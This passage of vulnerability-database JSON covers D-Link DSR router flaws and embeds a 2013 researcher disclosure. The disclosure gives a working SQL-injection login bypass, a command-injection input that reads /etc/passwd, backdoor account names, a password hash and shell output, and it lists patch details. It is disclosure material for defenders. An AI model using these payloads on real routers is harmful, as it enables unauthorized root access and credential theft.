"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-25759",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-25759",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2020-25759",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-72723",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202012-1105",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014722"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1105"
},
{
"db": "NVD",
"id": "CVE-2020-25759"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests. D-Link DSR-250 The device is vulnerable to input verification, and OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering. \n\r\n\r\nD-Link DSR-250 3.17 has a command injection vulnerability in the Unified Services Router web interface. Attackers can use this vulnerability to execute arbitrary commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25759"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014722"
},
{
"db": "CNVD",
"id": "CNVD-2020-72723"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25759",
"trust": 3.0
},
{
"db": "DLINK",
"id": "SAP10195",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014722",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-72723",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1105",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014722"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1105"
},
{
"db": "NVD",
"id": "CVE-2020-25759"
}
]
},
"id": "VAR-202012-0333",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72723"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72723"
}
]
},
"last_update_date": "2024-11-23T22:11:14.751000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Unauthenticated\u00a0\u0026\u00a0Authenticated\u00a0Command\u00a0Injection\u00a0Vulnerabilities",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link DSR-250 command injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/242233"
},
{
"title": "D-link DSR-250 Enter the fix for the verification error vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=137680"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014722"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1105"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.0
},
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "Incorrect input confirmation (CWE-20) [NVD Evaluation ]",
"trust": 0.8
},
{
"problemtype": "OS Command injection (CWE-78) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014722"
},
{
"db": "NVD",
"id": "CVE-2020-25759"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25759"
},
{
"trust": 1.6,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10195"
},
{
"trust": 1.6,
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
},
{
"trust": 1.6,
"url": "https://www.dlink.com/en/security-bulletin"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014722"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1105"
},
{
"db": "NVD",
"id": "CVE-2020-25759"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-72723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014722"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1105"
},
{
"db": "NVD",
"id": "CVE-2020-25759"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-12-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-72723"
},
{
"date": "2021-08-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-014722"
},
{
"date": "2020-12-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202012-1105"
},
{
"date": "2020-12-15T20:15:16.307000",
"db": "NVD",
"id": "CVE-2020-25759"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-12-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-72723"
},
{
"date": "2021-08-27T07:31:00",
"db": "JVNDB",
"id": "JVNDB-2020-014722"
},
{
"date": "2020-12-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202012-1105"
},
{
"date": "2024-11-21T05:18:41.377000",
"db": "NVD",
"id": "CVE-2020-25759"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202012-1105"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0DSR-250\u00a0 Input verification vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014722"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202012-1105"
}
],
"trust": 0.6
}
}
var-202102-0253
Vulnerability from variot
The D-Link DSR-250 (3.14) DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution. D-link DSR-250 is a unified service router
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202102-0253",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "3.14"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.11b201"
},
{
"model": "dsr-250 dsr-1000n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "(3.14)"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-12665"
},
{
"db": "NVD",
"id": "CVE-2020-18568"
}
]
},
"cve": "CVE-2020-18568",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2020-18568",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-12665",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2020-18568",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-18568",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2021-12665",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202102-192",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2020-18568",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-12665"
},
{
"db": "VULMON",
"id": "CVE-2020-18568"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-192"
},
{
"db": "NVD",
"id": "CVE-2020-18568"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The D-Link DSR-250 (3.14) DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution. D-link DSR-250 is a unified service router",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-18568"
},
{
"db": "CNVD",
"id": "CNVD-2021-12665"
},
{
"db": "VULMON",
"id": "CVE-2020-18568"
}
],
"trust": 1.53
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-18568",
"trust": 2.3
},
{
"db": "CNVD",
"id": "CNVD-2021-12665",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202102-192",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-18568",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-12665"
},
{
"db": "VULMON",
"id": "CVE-2020-18568"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-192"
},
{
"db": "NVD",
"id": "CVE-2020-18568"
}
]
},
"id": "VAR-202102-0253",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-12665"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-12665"
}
]
},
"last_update_date": "2024-11-23T23:01:08.971000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Vulnerability",
"trust": 0.1,
"url": "https://github.com/tzwlhack/Vulnerability "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-18568"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-18568"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://gist.github.com/winmin/5b2bc43b517503472bb28a298981ed5a"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-18568"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/tzwlhack/vulnerability"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-12665"
},
{
"db": "VULMON",
"id": "CVE-2020-18568"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-192"
},
{
"db": "NVD",
"id": "CVE-2020-18568"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-12665"
},
{
"db": "VULMON",
"id": "CVE-2020-18568"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-192"
},
{
"db": "NVD",
"id": "CVE-2020-18568"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-02-26T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-12665"
},
{
"date": "2021-02-02T00:00:00",
"db": "VULMON",
"id": "CVE-2020-18568"
},
{
"date": "2021-02-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202102-192"
},
{
"date": "2021-02-02T14:15:11.327000",
"db": "NVD",
"id": "CVE-2020-18568"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-02-26T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-12665"
},
{
"date": "2021-07-21T00:00:00",
"db": "VULMON",
"id": "CVE-2020-18568"
},
{
"date": "2021-02-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202102-192"
},
{
"date": "2024-11-21T05:08:39.290000",
"db": "NVD",
"id": "CVE-2020-18568"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202102-192"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-link DSR-250 UPnP service command injection vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-12665"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202102-192"
}
],
"trust": 0.6
}
}
var-202002-0660
Vulnerability from variot
Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua. plural D-Link The product has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. D-Link DSR is a wireless service router product. The successful use of the SQL injection vulnerability in the D-Link DSR router family enables attackers to control applications, access or modify data, and exploit other vulnerabilities in the underlying database to bypass authentication. D-Link DSR Router Series are prone to an SQL-injection vulnerability. #
CVEs:
CVE-2013-5945 - Authentication Bypass by SQL-Injection
CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
Vulnerable Routers:
D-Link DSR-150 (Firmware < v1.08B44)
D-Link DSR-150N (Firmware < v1.05B64)
D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
Download URL:
http://tsd.dlink.com.tw
Arch:
mips and armv6l, Linux
Author:
0_o -- null_null
nu11.nu11 [at] yahoo.com
Date:
2013-08-18
Purpose:
Get a non-persistent root shell on your D-Link DSR.
Prerequisites:
Network access to the router ports 443 and 23.
!!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
A list of identified vulns follows. This list is not exhaustive as I assume
more vulns are present that just slipped my attention.
The fact that D-Link implemented a backdoor user (for what reason, please??)
and just renamed it instead of completely removing it after it was targetted
by my previous exploit, as well as the triviality of those vulns I found
makes me suggest that more vulns are present that are comparably easy to
exploit.
Since 2013-12-03, patches are available for:
DSR-150: Firmware v1.08B44
DSR-150N: Firmware v1.05B64
DSR-250 and DSR-250N: Firmware v1.08B44
DSR-500 and DSR-500N: Firmware v1.08B77
DSR-1000 and DSR-1000N: Firmware v1.08B77
via http://tsd.dlink.com.tw
And now, have a worthwhile read :-)
-
Contents:
-
Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)
- Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)
- Exposure: D-Link backdoor user
- Vulnerability: Use of weak hash algorithms
- Exposure: Passwords are stored as plain text in config files
-
Vulnerability: Bad permissions on /etc/shadow
-
Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)
-
Possible via the global webUI login form.
-
File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:
function login.authenticate(tablename, tableInput) local username = tableInput["Users.UserName"] local password = tableInput["Users.Password"] local cur = db.execute(string.format([[ SELECT *, ROWID AS ROWID FROM %s WHERE %s = '%s' AND %s = '%s' ]], tablename, "UserName", username, "Password", password)) local result = false local statusCode = "NONE" if cur then local row = cur:fetch({}, "a") cur:close() result = row ~= nil if result == false then statusCode = "USER_LOGIN_INVALID_PASSWORD" end end return result, statusCode end
- This function creates an SQL statement of the form:
SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';
- Since there is a default admin user account called "admin" around, this is easily exploitable by providing this to the login form:
username = admin password = ' or 'a'='a
- ...resulting in this SQL statement:
SELECT * FROM "Users" WHERE "UserName" = 'admin' AND "Password" = '' or 'a'='a';
-
Old school SQL injection. Ohh, by the way...
-
The same fault can be found in captivePortal.lua -- FREE NETWORKS FOR EVERYONE --
-
Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)
-
Possible from the Tools --> System Check page.
-
File /pfrm2.0/var/www/systemCheck.htm contains:
local function runShellCmd(command) local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout local cmdOutput = pipe:read("*a") pipe:close() return cmdOutput end if (ButtonType and ButtonType == "ping") then [...] local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile globalCmdOutput = runShellCmd (cmd_ping) statusMessage = "Pinging " .. ipToPing [...] elseif (ButtonType and ButtonType == "traceroute") then [...] local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options globalCmdOutput = runShellCmd(cmd) statusMessage = "Traceroute To " .. ipToTraceRoute .. "..." [...] elseif (ButtonType and ButtonType == "dnslookup") then [...] util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile)) statusMessage = "DNS Lookup for " .. internetNameToNsLookup [...]
- Command injection is possible in at least these form sections:
Ping or Trace an IP Address Perform a DNS Lookup
-
When using a browser, deactivate the "onclick" JavaScript checks using a tool like Firebug. Tools like curl are not hindered by these checks.
-
All forms allow input like this:
localhost;
example:
localhost;cat /etc/passwd
-
This user provided value is then directly used as part of the input for the call to runShellCmd(c) and thus io.popen(c) in the first form section and os.execute(c) in the second form section.
-
Output from user provided commands gets displayed on the next page beneath the benign command output.
example:
[...]
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
</textarea>
[...]
3. Exposure: D-Link backdoor user:
* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
* You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7".
That was the account I hacked before with my previous exploit:
http://www.exploit-db.com/papers/22930/
And there is a new backdoor user "gkJ9232xXyruTRmY" introduced.
Instead of removing the backdoor, D-Link just created a new one.
* I verified this by showing the /etc/profile:
# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
trap "/bin/login" SIGINT
trap "" SIGTSTP
/pfrm2.0/bin/cli
exit
fi
PS1='DSR-250N> '
4. Vulnerability: Use of weak hash algorithms:
* In the /etc/shadow, salted DES hashes are used to store user passwords.
Since this hash type supports at most 8 characters, users can log in by just
typing the first 8 letters of their passwords when using SSH or telnet.
* An effective password length limitation of 8 characters makes brute force
attacks on user accounts very feasible, even if the user chose a longer
password.
5. Exposure: Passwords are stored as plain text in config files:
* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the
/tmp/system.db is built on boot time, reveals that all user passwords are
stored in plain text.
Example:
[...]
Users = {}
Users[1] = {}
Users[1]["Capabilities"] = ""
Users[1]["DefaultUser"] = "1"
Users[1]["UserId"] = "1"
Users[1]["FirstName"] = "backdoor"
Users[1]["OID"] = "0"
Users[1]["GroupId"] = "1"
Users[1]["UserName"] = "gkJ9232xXyruTRmY"
Users[1]["Password"] = "thisobviouslyisafakepass"
Users[1]["UserTimeOut"] = "10"
Users[1]["_ROWID_"] = "1"
Users[1]["LastName"] = "ssl"
[...]
6. Vulnerability: Bad permissions on /etc/shadow
* This file should have 600 permissions set and not 644. It is world readable.
Pointless, since every process runs as root, no user separation is
done anyway.
DSR-250N> ls -l -a /etc/shadow
-rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow
DSR-250N> ps
PID USER VSZ STAT COMMAND
1 root 2700 S init
2 root 0 SW< [kthreadd]
3 root 0 SW< [ksoftirqd/0]
4 root 0 SW< [events/0]
5 root 0 SW< [khelper]
8 root 0 SW< [async/mgr]
111 root 0 SW< [kblockd/0]
120 root 0 SW< [khubd]
123 root 0 SW< [kseriod]
128 root 0 SW< [kslowd]
129 root 0 SW< [kslowd]
150 root 0 SW [pdflush]
151 root 0 SW [pdflush]
152 root 0 SW< [kswapd0]
200 root 0 SW< [aio/0]
210 root 0 SW< [nfsiod]
220 root 0 SW< [crypto/0]
230 root 0 SW< [cns3xxx_spi.0]
781 root 0 SW< [mtdblockd]
860 root 0 SW< [usbhid_resumer]
874 root 0 SW< [rpciod/0]
903 root 0 SWN [jffs2_gcd_mtd4]
909 root 0 SWN [jffs2_gcd_mtd5]
918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon
1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db
1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db
1049 root 2704 S /usr/sbin/telnetd -l /bin/login
